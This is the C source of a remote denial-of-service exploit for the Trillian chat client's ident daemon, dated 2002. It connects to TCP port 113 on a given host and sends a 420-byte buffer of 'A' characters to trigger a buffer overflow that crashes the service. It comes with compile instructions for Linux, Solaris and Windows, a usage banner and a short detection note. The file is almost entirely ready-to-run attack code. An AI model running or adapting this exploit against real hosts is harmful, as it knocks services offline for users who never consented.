
/* Trillian .74, .73 remote DoS..  Trillian Pro 1.0
 *    Exploits a buffer overflow in the ident daemon, triggered by
 *    sending it more than 418 bytes.
 *
 *    Really only works if people are on IRC (otherwise, the ident
 *    daemon shuts down), and you've got to know they are running
 *    Trillian, obviously.
 *
 *    bug discovered by Lance Fitz-Herbert (aka phrizer) on 03 September 2002
 *
 *
 * Compile With:
 * Linux: gcc -o trillident trillident.c
 * Solaris: gcc -o trillident trillident.c -lsocket -lnsl
 * Windows: Download trillident.exe, or compile as normal, with GNU getopt



                                    ZZZZZZZZZZZZZZZZZZZ
                                    Z:::::::::::::::::Z
                  nnnn  nnnnnnnn    Z:::::::::::::::::Z   ooooooooooo
                  n:::nn::::::::nn  Z:::ZZZZZZZ::::::Z  oo:::::::::::oo
     eeeeeeeeeee  n::::::::::::::nn ZZZZZ  * Z::::::Z  o:::::::::::::::o
   ee:::::::::::eenn:::::::::::::::n      2 Z:::::Z    o:::::ooooo:::::o
  e:::::::::::::::een:::::nnnn:::::n     0 Z:::::Z     o::::o     o::::o
 e::::::eeeee::::::en::::n    n::::n    0 Z:::::Z      o::::o     o::::o
 e:::::e     e:::::en::::n    n::::n   2 Z:::::Z       o::::o     o::::o
 e::::::eeeee::::::en::::n    n::::n  * Z:::::Z        o::::o     o::::o
 e::::::::::::::::e n::::n    n::::n   Z:::::Z         o:::::ooooo:::::o
 e:::::eeeeeeeeeee  n::::n    n::::nZZZ:::::Z     ZZZZZo:::::::::::::::o
 e::::::e           n::::n    n::::nZ::::::ZZZZZZZZ:::Z oo:::::::::::oo
 e:::::::e          nnnnnn    nnnnnnZ:::::::::::::::::Z   ooooooooooo
  e:::::::eeeeeeeeee                Z:::::::::::::::::Z
   ee::::::::::::::e                ZZZZZZZZZZZZZZZZZZZ
    ee:::::::::::::e             \... www.enZotech.net .../
     eeeeeeeeeeeeee
                 

*/

#ifdef _WIN32
#include <winsock.h> 
#include <stdio.h>
#include <stdlib.h>
#include "getopt.h"
#else
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#endif
#define ERR -1



/* Print the banner and option summary to stderr, then exit(1). */
void usage(char* argv0);
/* Connect to ip:port over TCP and write the 420-byte test buffer once. */
int dostrill(char *ip, int port);

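/*
 * Entry point: parse the command line, validate it, and run dostrill().
 *
 * Options:
 *   -p PORT  TCP port to connect to (default 113, the ident port).
 *   -v       Print the program banner and exit.
 * Exactly one positional argument, the target host name or IPv4 address,
 * must follow the options.
 *
 * Returns dostrill()'s status, so the exit code is 0 only when the run
 * succeeded.
 */
int main(int argc, char *argv[])
{
	extern int optind;
	extern int optopt;
	extern char *optarg;
	int errorflag = 0;	/* number of command-line errors seen */
	int port = 113;		/* default port to use unless -p */
	int status;
	int c;
#ifdef _WIN32
	WSADATA wd;

	/* Winsock must be initialised before any socket call; bail out if not. */
	if (WSAStartup(MAKEWORD(2, 0), &wd) != 0) {
		fprintf(stderr, "Couldn't Initialise Winsock\n");
		return 1;
	}
#endif

	if ((argc < 2) || (argc > 6)) {
		usage(argv[0]);
	}

	/*
	 * The leading ':' makes getopt return ':' for a missing operand, so the
	 * dedicated case below is reachable; without it getopt reports every
	 * error as '?'.
	 */
	while ((c = getopt(argc, argv, ":vp:")) != -1) {
		switch (c) {
		case 'p': {
			char *end;
			long value = strtol(optarg, &end, 10);

			/* Reject non-numeric text and anything outside the TCP port range. */
			if (end == optarg || *end != '\0' || value < 1 || value > 65535) {
				fprintf(stderr, "Invalid port: %s\n", optarg);
				errorflag++;
				break;
			}
			port = (int) value;
			fprintf(stderr, "Using port %s\n", optarg);
			break;
		}
		case 'v':
			fprintf(stderr, "Trillian Ident DoS - [Sep 19, 2002]\n");
			exit(0);
		case ':':
			fprintf(stderr, "Option -%c requires an operand\n", optopt);
			errorflag++;
			break;
		case '?':
			fprintf(stderr, "Unrecognized option: -%c\n", optopt);
			errorflag++;
			break;
		default:
			errorflag++;
			break;
		}
	}

	/*
	 * Require exactly one operand after the options. Taking argv[argc-1]
	 * unconditionally would treat an option or its value (e.g. the "113" in
	 * "-p 113") as the host when the target is missing.
	 */
	if (errorflag || optind != argc - 1) {
		usage(argv[0]);
	}

	status = dostrill(argv[optind], port);

#ifdef _WIN32
	WSACleanup();
#endif

	/* Only report completion when the run actually succeeded. */
	if (status == 0) {
		fprintf(stderr, "Finished!\n");
	}
	return status;
} /* end main */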

/*
 * Write the program banner, the invocation synopsis and the option list to
 * stderr, then terminate the process with exit status 1.
 *
 * argv0 is the program name shown in the synopsis line.
 */
void usage(char* argv0)
{
	/* Option summary, kept as one string so it is emitted in a single call. */
	static const char option_help[] =
		"-p \tPort to use\n"
		"-v \tPrint the program info\n";

	fputs("Trillian Ident DoS - [Sep 19, 2002]\n", stderr);
	fprintf(stderr, "Usage: %s [options] IP\n\n", argv0);
	fputs(option_help, stderr);

	exit(1);
}

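/*
 * Open one TCP connection to ip:port and write a 420-byte buffer of 'A'
 * characters, the oversized ident request described in the file header.
 *
 * ip   - host name or dotted-quad IPv4 address of the system under test.
 * port - TCP port, 1..65535.
 *
 * Returns 0 when the whole buffer was written, 1 on any failure (bad
 * arguments, resolution, socket, connect or send error).
 *
 * Detection note: a well-formed ident (RFC 1413) query is a short
 * "<port> , <port>" line, so a request of several hundred bytes with no
 * line terminator on TCP/113 is anomalous and easy to flag.
 */
int dostrill(char *ip, int port)
{
	int s, r;
	int rc = 1;
	long sent;
	char buf[420];
	struct sockaddr_in addr;
	struct hostent *hp;

	if (ip == NULL || port < 1 || port > 65535) {
		fprintf(stderr, "Invalid host or port\n");
		return 1;
	}

	memset(&addr, 0, sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_port = htons((unsigned short) port);

	/* buf is raw bytes, not a C string: it is never NUL-terminated. */
	memset(buf, 'A', sizeof(buf));

	hp = gethostbyname(ip);
	if (hp != NULL && hp->h_addrtype == AF_INET && hp->h_length > 0 &&
	    hp->h_addr_list != NULL && hp->h_addr_list[0] != NULL) {
		/*
		 * Clamp with a local length instead of writing into the resolver's
		 * hostent, which this function does not own.
		 */
		size_t len = (size_t) hp->h_length;

		if (len > sizeof(addr.sin_addr)) {
			len = sizeof(addr.sin_addr);
		}
		memcpy(&addr.sin_addr, hp->h_addr_list[0], len);
	} else {
		/*
		 * inet_addr() signals failure with INADDR_NONE; s_addr is unsigned,
		 * so a "< 0" comparison can never detect it.
		 */
		addr.sin_addr.s_addr = inet_addr(ip);
		if (addr.sin_addr.s_addr == INADDR_NONE) {
			fprintf(stderr, "Couldn't Resolve Host\n");
			return 1;
		}
	}

	s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (s == ERR) {
		fprintf(stderr, "Couldn't Create Socket\n");
		return 1;
	}

	r = connect(s, (struct sockaddr *) &addr, sizeof(addr));
	if (r == ERR) {
		fprintf(stderr, "Couldn't Establish Connection\n");
		goto out;	/* close the socket instead of leaking it */
	}

	fprintf(stderr, "Connected to %s and sending buffer\n\n", ip);

	/*
	 * Use sizeof(buf), not strlen(buf): strlen on the unterminated buffer
	 * is undefined behaviour and would read past buf, putting whatever
	 * stack bytes follow it onto the wire.
	 */
#ifdef _WIN32
	sent = send(s, buf, (int) sizeof(buf), 0);
#else
	sent = (long) write(s, buf, sizeof(buf));
#endif
	if (sent != (long) sizeof(buf)) {
		fprintf(stderr, "Couldn't Send Buffer\n");
		goto out;
	}

	rc = 0;

out:
#ifdef _WIN32
	closesocket(s);
#else
	close(s);
#endif
	return rc;
}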
